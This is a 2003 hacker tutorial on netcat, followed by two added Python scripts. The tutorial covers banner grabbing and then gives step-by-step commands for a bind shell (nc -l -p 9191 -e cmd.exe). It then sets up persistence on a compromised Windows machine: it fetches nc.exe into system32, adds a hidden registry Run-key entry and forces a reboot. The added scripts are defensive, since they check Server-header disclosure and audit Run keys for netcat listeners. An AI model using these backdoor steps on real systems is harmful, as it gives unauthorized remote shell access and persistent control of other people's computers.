Date: 2003-11-14 Written by: mxpack3t
Disclosure: Copyright 2003 mxpack3t. This document is protected by international copyright laws. Unauthorized duplication in whole or in part is prohibited. In no way do I promote hacking for illegal actions. You are responsible for the knowledge you gain from this tutorial. The tutorial is for educational and security purposes only and nothing else.

=====================================================================================

This tutorial puts you into a hacker's point of view. Do not penetrate any systems and do not set up backdoors on a system you do not have permission on. It's illegal and you will get busted sooner or later. I cannot be held responsible for your actions.

Netcat is by far one of the most reliable tools in any hacker's arsenal. There are so many things netcat can do for you. Here you will learn some basic commands to understand what netcat is and how hackers use this tool.

Download Site

The good thing about netcat is that there is a linux/unix version and a windows version. So now that you have it, let's get started. In this tutorial I will show you how netcat can be used to get banner information and how to set it up as a back door on another system.

Banner grabbing is very important in the fingerprinting process. Let's say there is an exploit that you know of for Apache 1.3.27 on a linux machine, and the target system is running IIS 5.0 Microshaft. Oh, I'm sorry, it's called Microsoft. Since the target system is running IIS 5.0 Microsoft, the exploit will not work. But so many times newbies will just fire up that exploit and try it anyway. What a waste of time and effort. Now that you know the exploit will not work on the target you will need to find another way. So how do we do this banner grabbing stuff you're talking about? Simple, use netcat to find out what webserver is running and what type of OS it is.
C:\nc11nt> echo 'HEAD / HTTP/1.0' | nc domain_name.com 80

HTTP/1.1 400 Bad Request
Date: Wed, 13 Aug 2003 16:44:01 GMT
Server: Apache/1.3.27 (Unix) mod_gzip/1.3.26.1a FrontPage/5.0.2.2510 mod_jk/1.1.0
Connection: close
Content-Type: text/html; charset=iso-8859-1

**** Also below here you will see a 400 error. ****

What you need to look for is the Server: line. After Server: you will notice the system is running Apache/1.3.27 and it's a Unix system. Now the exploit might work and it might not. There are many reasons for this. One is that the system is patched and the exploit will not work. The other is more detailed: the exploit might not work on some linux/unix systems. Ever heard of the apache-nosejob code? Well, the thing about that is the code was written for FreeBSD and OpenBSD systems. The code did not work on, let's say, a Redhat linux system. So even if you do have the exploit code, sometimes you need to recode it to work on another type of OS. That's why it's so important to learn the C language, since most exploits are written in C.

Here is another way of getting the same information. What we did above is echo the HEAD / HTTP/1.0 command and pipe it to netcat. If you don't want to do it that way, you can do it this way instead. Open up your favorite text editor and type this:

HEAD / HTTP/1.0
(press_enter)
(press_enter)

Make sure that you press enter twice. Now save it as head.txt and go back to netcat. Type this into the command shell:

C:\nc11nt> nc -v domain_name.com 80 < head.txt

What netcat does is read what's in the head.txt file. Make sure to have the head.txt file in the same directory as netcat. Now make a get.txt file. Do the same thing except replace HEAD with GET and it will get the whole page. I don't like doing this; all you need is the HEAD command in the file. Do not type (press_enter) in the file, just hit the enter key twice. Use this to find some information about the target system.
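The Server: line above is exactly what an administrator should be checking on their own hosts, because the same header that tells an attacker "Apache/1.3.27 on Unix" tells you how much your servers disclose. The script below is an added example, not part of the original tutorial: it parses the raw response text captured from a netcat HEAD request (the response shown above is embedded as the sample) and reports the Server header, each product/version pair in it, and the OS comment. The helper names parse_response and server_disclosure are my own.

```python
"""Parse a raw HTTP response (as captured from a netcat HEAD request)
and report what the Server header discloses.

Added example for this tutorial, not part of the original text. The
response below is the one shown in the tutorial; the helper names
(parse_response, server_disclosure) are my own. Run it against your own
hosts to see how much version detail they hand out."""

import re

# Response text reproduced from the tutorial's netcat session.
SAMPLE_RESPONSE = (
    "HTTP/1.1 400 Bad Request\r\n"
    "Date: Wed, 13 Aug 2003 16:44:01 GMT\r\n"
    "Server: Apache/1.3.27 (Unix) mod_gzip/1.3.26.1a FrontPage/5.0.2.2510 mod_jk/1.1.0\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
)


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers dict).

    Header names are lower-cased; only the header block (up to the first
    blank line) is read, so any body is ignored."""
    head, _, _body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    status = lines[0].split(" ", 2)
    if len(status) < 2 or not status[1].isdigit():
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return int(status[1]), headers


# Product/version tokens such as "Apache/1.3.27" or "mod_jk/1.1.0".
_TOKEN = re.compile(r"([A-Za-z][\w.-]*)/(\d[\w.-]*)")


def server_disclosure(raw):
    """Describe what the Server header gives away: the bare header, each
    product with its version, and the OS comment in parentheses if any."""
    _status, headers = parse_response(raw)
    server = headers.get("server", "")
    os_match = re.search(r"\(([^)]*)\)", server)
    return {
        "server": server,
        "products": dict(_TOKEN.findall(server)),
        "os": os_match.group(1) if os_match else None,
        # Any product/version token means the header has not been trimmed
        # (Apache's ServerTokens Prod would leave just "Apache").
        "leaks_versions": bool(_TOKEN.search(server)),
    }


if __name__ == "__main__":
    info = server_disclosure(SAMPLE_RESPONSE)
    print("Server header :", info["server"])
    print("OS comment    :", info["os"])
    print("Products      :", info["products"])
    print("Leaks versions:", info["leaks_versions"])
```

Feed it the output of `nc -v your_host 80 < head.txt` saved to a file and compare hosts: a Server line of just "Apache" means version disclosure is already turned off, while the tutorial's sample hands out the core version, the OS family and three module versions in one line.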
Now let's move onto something else, like how someone could set up a backdoor using netcat. This section is best done with a friend. So call up a hacker buddy and both of you can practice setting up backdoors on each other. Tell your friend to download netcat. I am going to make this simple so you can get a good understanding. Then we can move onto more difficult things on setting up backdoors with netcat.

Now that your friend has netcat installed, make sure both of you are in the netcat directory. This next part is very important. Have your friend type this on the command line:

C:\nc11nt> nc -l -p 9191 -e cmd.exe

What this command does is set up netcat to listen on port 9191. Now when you connect to the system on port 9191 with netcat it will bind to that port. Here is what the options mean:

-l = connect over and over again with the same process.
-p 9191 = p is for port and 9191 is the port number.
-e cmd.exe = this will spawn a command shell to you when you connect.

Now it's time for you to connect to your friend's system. So type this command:

C:\nc11nt> nc 192.168.1.1 9191

Replace 192.168.1.1 with your friend's ip address. If you don't know the ip address, no problem. Just scan the c class for port 9191 and you will find your friend's system. A great tool for this is scanline from Foundstone. Download scanline (click Resources, Free Tools, then Scanning Tools). Scanline is a command line program. Those command line tools are great. Go to the scanline directory in the command prompt. Now type this to scan a c class for a certain port:

C:\scanline> sl -bht 9191 192.168.1.1-255

-b = get port banners
-h = hide results for systems that don't have port 9191 open
-t = tcp port to scan

Ok, now it's time to have some real fun. Tell your friend to set up netcat to listen on a port. Let's say 8000 is the port. We will say that port 8000 is running a new chat program that everybody likes to use. There is an exploit that came out for this new chat program.
So you fire up this exploit and run it against the system using 8000 as the port. Let's say netcat is that exploit. This is just an example. So run netcat targeting your friend's system. Remember you can use scanline to scan for systems with port 8000 open. We are just pretending netcat is a new exploit that came out for the chat client, that will drop you into a command prompt. This is just an example.

c:\netcat> nc 192.168.1.1 8000

This will drop you into a command prompt, kinda like the dcom rpc exploit. Ok, so you are in the system. Now there's no time to waste. You need to set up netcat as the backdoor. Here is one way of doing this. Download nc.exe from a free ftp account and put it into the system32 folder. Some people might say it's wrong to put it in system32, but it will run. Besides, it works and that's all that matters. There are a lot of free webhosts where you can store files and ftp to the account. Now that you are in the system and have a command shell, do these commands:

cd c:\WINDOWS\system32
ftp free_account.domain.com

Now there is something you should remember. If not, then this will not work. Make sure you upload netcat in binary format. I say again, make sure you upload netcat in binary format. Also make sure you download in binary format. When you ftp to your account just type binary and that will put you in binary mode. If you do not do this, when you try to run netcat you will get an error.

Now that you have downloaded netcat on the target machine it's time to set it up as a backdoor. We will put netcat in the registry, so when the system is rebooted it will listen on the port you want. So type this on the target machine in the command prompt from netcat to set it up:

reg add hklm\software\microsoft\windows\currentversion\run /v backdoor /t reg_sz /d nc -l -d -p 9191 -e cmd.exe

Didn't work. The error you got should have said something like this: Too many command line parameters.
The reason for this is we need to put " " around the command whenever there are spaces. So rewrite it like this:

reg add hklm\software\microsoft\windows\currentversion\run /v backdoor /t reg_sz /d "nc -l -d -p 9191 -e cmd.exe"

Now it should work fine. There are a few things that need to be covered. If you do not understand what the registry is, then don't bother with it. Go to google and read up on reg add and reg delete to fully understand what you are doing. The command reg add just adds things to the registry. So here is what the options mean:

/v = Entry Name; we named it backdoor
/t = Data type, like ascii or binary
/d = Value, in other words the command to execute.

Also you will notice a new option in the nc command. The -d option means stealth mode. So when the system is rebooted, netcat will listen on port 9191 for you. So all you need to do is this:

nc 192.168.1.1 9191

and you're set! So tell your friend to check the registry with regedit. Backdoor should be there. Now reboot the system for him!

shutdown -r -t 1

-r = reboot
-t = pause 1 second before rebooting, default is 30 seconds.

When the system comes back up it will be listening on port 9191 for you. So go ahead and connect with this command:

nc 192.168.1.1 9191

and you are now connected to your friend's ip address. Now that you have successfully set up a backdoor, it's time to remove it. Just a reminder: always kill the nc.exe process on the computer that is listening on a port. If someone scans your friend and uses netcat they can connect to his system. I would suggest making a new account and then removing it when you're done. This is how you will delete the backdoor from the registry. In the command prompt on the target machine, type this:

reg delete hklm\software\microsoft\windows\currentversion\run /v backdoor

Make sure to tell your friend to check the registry to make sure it is removed. That's it for now. Hope you enjoyed the tutorial. Make sure to leave comments on the forums.

-mxpack3t
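The tutorial twice tells the friend to "check the registry" with regedit, once to confirm the entry landed and once to confirm it is gone. The Run key is small enough that this check can be scripted, and it is the check a defender wants after any incident like the one the tutorial walks through. The script below is an added example, not part of the original tutorial: it tokenizes each HKLM\...\Run value, flags any netcat binary, any -e or -c option that hands a connecting client a shell (so a renamed nc.exe is still caught), and then lists the supporting details the tutorial's own command carries (-l listen, -p port, -d detach). The sample values are constructed around the tutorial's "backdoor" entry, and the function names are my own; on Windows read_run_key() reads the live key through Python's standard winreg module, elsewhere the sample is used.

```python
"""Audit Windows Run-key autostart entries for netcat-style listeners.

Added example for this tutorial, not part of the original text. The
SAMPLE_RUN_VALUES below are constructed to mirror the tutorial's
'backdoor' entry next to ordinary autostarts; the function names are
my own. On Windows, read_run_key() pulls the live values through the
standard winreg module; on other platforms it returns None."""

import re
import shlex

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample of HKLM\...\Run values after the tutorial's reg add.
SAMPLE_RUN_VALUES = {
    "SoundMan": r"C:\WINDOWS\system32\SOUNDMAN.EXE",
    "backdoor": "nc -l -d -p 9191 -e cmd.exe",
    "Updater": r'"C:\Program Files\Vendor\update.exe" /quiet',
}

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd", "cmd.exe", "command.com", "powershell", "powershell.exe",
          "sh", "bash"}


def tokenize(command):
    """Split a Run-key command line into tokens, honouring quotes.
    posix=False keeps Windows backslashes literal; surrounding quotes
    are stripped afterwards."""
    try:
        toks = shlex.split(command, posix=False)
    except ValueError:          # unbalanced quotes: degrade to whitespace split
        toks = command.split()
    return [t.strip('"') for t in toks]


def analyse_entry(command):
    """Return the reasons an autostart command looks like a netcat
    listener serving a shell; an empty list means nothing netcat-specific."""
    toks = tokenize(command)
    if not toks:
        return []
    exe = toks[0].rsplit("\\", 1)[-1].lower()
    args = toks[1:]
    lower = [a.lower() for a in args]
    reasons = []
    if exe in NETCAT_NAMES:
        reasons.append("executable is netcat (%s)" % toks[0])
    # -e/-c <program>: the connecting client is wired to that program's
    # stdin/stdout. A shell here is the tutorial's backdoor no matter
    # what the binary was renamed to.
    for opt in ("-e", "-c"):
        if opt in lower:
            i = lower.index(opt)
            target = lower[i + 1].rsplit("\\", 1)[-1] if i + 1 < len(lower) else ""
            if target in SHELLS:
                reasons.append("%s hands out a shell (%s)" % (opt, args[i + 1]))
    if not reasons:
        return []           # ordinary autostart: leave it alone
    if "-l" in lower:       # covers -l and the Windows build's persistent -L
        reasons.append("listen flag (-l/-L): waits for inbound connections")
    port = re.search(r"-p\s+(\d+)", command)
    if port:
        reasons.append("listens on TCP port %s" % port.group(1))
    if "-d" in lower:
        reasons.append("-d detaches from the console, so no window is shown")
    return reasons


def audit_run_values(values):
    """Map entry name -> reasons, for the entries that deserve a look."""
    findings = {}
    for name, command in values.items():
        reasons = analyse_entry(command)
        if reasons:
            findings[name] = reasons
    return findings


def read_run_key():
    """Read the live HKLM Run values (Windows only); None elsewhere."""
    try:
        import winreg
    except ImportError:
        return None
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _kind = winreg.EnumValue(key, index)
            except OSError:         # no more values
                break
            values[name] = str(data)
            index += 1
    return values


if __name__ == "__main__":
    values = read_run_key() or SAMPLE_RUN_VALUES
    for name, reasons in audit_run_values(values).items():
        print("[!] %s = %s" % (name, values[name]))
        for reason in reasons:
            print("      -", reason)
```

Run it before and after the reg delete step: the first run should report the "backdoor" entry with all five reasons, the second should report nothing. The same HKCU Run key, and the RunOnce keys beside it, take the same treatment by changing RUN_KEY and the hive; and because the check keys on the -e shell rather than on the name nc.exe, it still fires when the binary has been renamed to look like a system service.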